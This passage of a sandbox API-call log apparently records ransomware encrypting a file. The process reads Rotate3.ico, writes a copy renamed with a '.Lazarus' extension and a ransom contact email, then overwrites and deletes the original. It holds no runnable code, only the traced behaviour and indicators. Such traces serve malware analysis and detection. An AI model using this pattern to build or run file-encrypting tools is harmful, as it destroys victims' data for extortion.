lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.782] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0074.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0074.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.783] AreFileApisANSI () returned 1 [0074.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico", lpUsedDefaultChar=0x0) returned 43 [0074.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0074.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.783] AreFileApisANSI () returned 1 [0074.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x66f40 [0074.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 43 [0074.783] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.783] GetFileType (hFile=0x42c) returned 0x1 [0074.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0074.784] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0074.784] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0074.784] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0074.784] CloseHandle (hObject=0x42c) returned 1 [0074.784] AreFileApisANSI () returned 1 [0074.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 43 [0074.784] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.785] GetFileType (hFile=0x42c) returned 0x1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.785] CloseHandle (hObject=0x42c) returned 1 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.786] AreFileApisANSI () returned 1 [0074.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x66f40 [0074.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 43 [0074.786] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0074.786] AreFileApisANSI () returned 1 [0074.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0074.786] GetLastError () returned 0x0 [0074.786] SetLastError (dwErrCode=0x0) [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0074.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0074.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0074.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0074.787] GetLastError () returned 0x0 [0074.787] SetLastError (dwErrCode=0x0) [0074.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0074.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0074.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0074.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0074.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0074.787] AreFileApisANSI () returned 1 [0074.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0074.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x5a6b8 [0074.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=105 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 105 [0074.787] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.787] GetFileType (hFile=0x42c) returned 0x1 [0074.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0074.788] AreFileApisANSI () returned 1 [0074.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 43 [0074.788] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.788] GetFileType (hFile=0x410) returned 0x1 [0074.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0074.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.788] GetLastError () returned 0x0 [0074.788] SetLastError (dwErrCode=0x0) [0074.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.788] GetLastError () returned 0x0 [0074.788] SetLastError (dwErrCode=0x0) [0074.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.789] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x37e, lpOverlapped=0x0) returned 1 [0074.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0074.790] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0074.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0074.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0074.791] GetLastError () returned 0x0 [0074.791] SetLastError (dwErrCode=0x0) [0074.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d4c8 [0074.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0074.791] GetLastError () returned 0x0 [0074.791] SetLastError (dwErrCode=0x0) [0074.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0074.791] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0x380, lpOverlapped=0x0) returned 1 [0074.792] GetLastError () returned 0x0 [0074.792] SetLastError (dwErrCode=0x0) [0074.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0074.792] GetLastError () returned 0x0 [0074.792] SetLastError (dwErrCode=0x0) [0074.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0074.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0074.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0074.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0074.792] CloseHandle (hObject=0x42c) returned 1 [0074.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.793] CloseHandle (hObject=0x410) returned 1 [0074.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0074.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.793] AreFileApisANSI () returned 1 [0074.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67a20 [0074.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 43 [0074.793] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.794] GetFileType (hFile=0x410) returned 0x1 [0074.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0074.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.795] GetLastError () returned 0xb7 [0074.795] SetLastError (dwErrCode=0xb7) [0074.795] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0074.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.796] CloseHandle (hObject=0x410) returned 1 [0074.796] AreFileApisANSI () returned 1 [0074.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0074.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 43 [0074.796] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico")) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0074.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 